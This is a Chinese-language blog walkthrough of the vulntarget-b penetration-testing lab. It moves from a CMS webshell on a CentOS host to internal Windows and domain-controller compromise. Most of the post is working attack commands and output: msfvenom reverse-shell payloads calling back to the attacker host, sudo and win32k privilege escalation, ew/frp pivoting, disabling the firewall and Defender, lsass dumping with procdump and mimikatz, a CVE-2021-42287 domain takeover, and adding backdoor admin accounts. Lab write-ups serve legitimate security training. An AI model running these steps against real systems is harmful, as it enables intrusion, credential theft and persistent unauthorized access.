Gridea

温故而知新

首页 归档 标签 关于

【靶场系列】vulntarget-b靶场练习

2022-05-05 11 min read # 靶场 # 内网渗透 # vulntarget

记录vultarget靶场系列,学习内网渗透相关知识

外网centos7

web打点

scaninfo扫描,开了如下端口和web服务

image-20220320214629633
image-20220320214647170

蚁剑上线

打了一下宝塔的phpmyadmin未授权访问,无果,于是看81端口下的极致CMS

后台登录验证码不刷新,爆破出了弱口令:admin:admin123

经过一番搜索得知,后台存在在线编辑的插件,可以用来getshell

image-20220320215237118

写入一句话目录,蚁剑连接

image-20220320215418487

连接后发现是www用户权限,且很多命令无法执行

(www:ret=127) $ whoami
ret=127

尝试用插件bypass_disable_function,可以成功绕过

image-20220320215713076

MSF上线

生成一个tcp反向马,kali监听

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.1.214 lport=4444 -f elf -o 4444.elf

┌──(root💀kali)-[~]
└─# msfconsole -q
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.214
lhost => 192.168.1.214
msf6 exploit(multi/handler) > run

蚁剑上传该马,chmod+x后执行,拿到session

image-20220325161600121

提权

由于获取到的是www用户session,尝试进行提权

使用MSF自动探测是否存在提权漏洞,

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 192.168.1.104 - Collecting local exploits for x64/linux...
[*] 192.168.1.104 - 40 exploit checks are being tried...
[+] 192.168.1.104 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.1.104 - exploit/linux/local/ptrace_traceme_pkexec_helper: The target appears to be vulnerable.
[+] 192.168.1.104 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build

根据描述,尝试使用exploit/linux/local/sudo_baron_samedit模块

攻击失败,但建议我们选择第12个target

image-20220325164624541

选择target 12后,再次run,直接获得一个root权限的会话

image-20220325165921128

拿到/etc/shadow,爆破出口令root:root

image-20220326102804378
image-20220326102749214

内网Windows

信息搜集

ipconfig后发现存在内网

image-20220325170037088

传一个fscan扫内网,没啥收获,猜测内网禁用了ping

image-20220325175812684

使用arp查看缓存,也没发现内网机器

image-20220325175926433

添加路由表,以便访问内网

meterpreter > run post/multi/manage/autoroute

开一个socks代理

msf6 exploit(linux/local/sudo_baron_samedit) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options 

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server


msf6 auxiliary(server/socks_proxy) > run

kali上使用nmap,-Pn忽略主机存活,-p指定常见端口,没有获取到啥有用的信息

proxychains nmap -Pn -sT -p 21,22,145,3306,80,8080 10.0.20.0/24
image-20220325205445054

直接用msf自带的端口扫描模块,发现内网一个主机,开放了8080端口

 use auxiliary/scanner/portscan/tcp
 set rhosts 10.0.20.0/24
 set ports 21,22,80,135,139,443,445,8080
 set threads 30
image-20220325210530842

禅道getshell

通过kali的代理访问到该主机:8080,为禅道的web服务

image-20220325210715588

弱口令admin/Admin123进入,得到版本为12.4.2,搜索历史版本漏洞

发现有个后台getshell:https://www.secpulse.com/archives/146782.html

使用自带的python2开启http服务,将外网机器的马暴露出去供下载

meterpreter > shell
Process 15094 created.
Channel 7970 created.
pwd
/www/wwwroot/jizhi/install
python -m SimpleHTTPServer 1234

下载地址Base64编码

image-20220325211409800

漏洞EXP:http://192.168.159.129:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6MTIzNC95dC5waHA=

显示保存成功

访问马:http://10.0.20.66:8080/data/client/1/yt.php,蚁剑挂上kali代理即可连上

image-20220325211621314

webshell中显示是低权限的iis用户,同时发现还有张网卡

image-20220325211845845

tasklist -v发现火绒

image-20220325212528184

MSF上线

尝试用centos当跳板,kali监听,内网通过centos连接到kali,从而拿到session

外网主机运行ew代理,监听1080端口,并将流量转发至kali监听的4444端口

[root@localhost install]# ./ew_for_linux64 -s lcx_tran -l 1080 -f 192.168.1.214 -g 4444
lcx_tran 0.0.0.0:1080 <--[10000 usec]--> 192.168.1.214:4444

kali生成tcp反向马,并使用掩日进行免杀

┌──(root💀kali)-[~]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.104 lport=4444 -f exe -o 1.exe

使用蚁剑上传马时,发现通过kali的msf代理连接内网非常非常慢

既然都拿下了外网主机,那直接在外网使用ew监听,之后使用该端口访问内网

[root@localhost install]# ./ew_for_linux64 -s ssocksd -l 2938
ssocksd 0.0.0.0:2938 <--[10000 usec]--> socks server

蚁剑运行马,发现外网主机的ew报错

image-20220326104912887

排错发现是生成马的时候,lhost应该填外网主机的内网地址10.0.20.30,之后msf成功上线,但是在没有交互后很快就断开了,应该是ew内部设计的问题?

image-20220326111604216

之后转用frp,将内网的3289端口映射到外网主机的3289端口,生成一个正向tcp马,内网运行该马和frpc,kali连接到外网3289端口即可拿到内网主机的session

frpc.ini

[common]
server_addr = 10.0.20.30
server_port = 7000

[adwdsa]
type = tcp
local_ip = 127.0.0.1
local_port = 3289
remote_port = 3289
image-20220326122621397

添加路由

meterpreter > run post/multi/manage/autoroute

提权

探测提权漏洞

meterpreter > run post/multi/recon/local_exploit_suggester

[*] fe80::d08d:a6b4:c348:c39b - Collecting local exploits for x64/windows...
[*] fe80::d08d:a6b4:c348:c39b - 28 exploit checks are being tried...
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/bits_ntlm_token_impersonation: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The target appears to be vulnerable. Vulnerable Windows 10 v1909 build detected!
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2020_0796_smbghost: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2020_1313_system_orchestrator: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2020_17136: The target appears to be vulnerable. A vulnerable Windows 10 v1909 build was detected!
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2021_1732_win32k: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.

使用exploit/windows/local/cve_2021_1732_win32k

首先将内网路由改为外网机器的session

msf6 exploit(windows/local/cve_2021_1732_win32k) > route remove 10.0.20.0 255.255.255.0 9 
[*] Route removed
msf6 exploit(windows/local/cve_2021_1732_win32k) > route add 10.0.20.0  255.255.255.0  2

在内网任意端口监听,有可能攻击失败,多run几次

msf6 exploit(windows/local/cve_2021_1732_win32k) > set lhost 10.0.20.30
msf6 exploit(windows/local/cve_2021_1732_win32k) > set lport 4321
msf6 exploit(windows/local/cve_2021_1732_win32k) > set session 9
msf6 exploit(windows/local/cve_2021_1732_win32k) > run

[*] Started reverse TCP handler on 10.0.20.30:4321 via the meterpreter on session 2
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[+] Process 1088 launched.
[*] Reflectively injecting the DLL into 1088...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
image-20220402112556847

后面发现直接getsystem也能提权。。

meterpreter > getsystem 
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

进程迁移

meterpreter > run post/windows/manage/migrate

[*] Running module against WIN10
[*] Current server process: notepad.exe (6732)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 3504
[+] Successfully migrated into process 3504

关闭防火墙&杀软

netsh advfirewall set allprofiles state off
net stop windefend

尝试taskkill /pid xxx /F关闭火绒,发现出错,查询后发现杀软都会对自身进程做防护

image-20220326125456713

信息搜集

systeminfo发现域环境

image-20220402112932145

抓取密码

meterpreter > load kiwi
meterpreter > creds_all
image-20220401114715278

解密并记录:

  • WIN10/Administrator:admin@123
  • VULTARGET/win101:admin#123

读取flag

image-20220401115129607

开启远程桌面

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

配置代理后直接使用administrator登录(当然也可以添加个账户登录)

proxychains remmina
image-20220402114151363

arp

image-20220402120514258

域控

fscan定位到域控

image-20220402120544491

CVE-2021-42287

proxychains python sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell
image-20220403160728340

添加用户

net user john admin@123 /add
net localgroup administrators john /add

开启3389(三条命令

reg add "HKLM\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

kali使用remmina命令成功远程登录

image-20220403162138766

remmina中配置共享文件夹,上传一个procdump并执行(cmd以管理员身份运行)

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
image-20220403164802999

将生成的文件传回,使用mimikatz查看

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

得到多个用户名和NTLM

image-20220506105810276
image-20220506105828037
Powered by Gridea RSS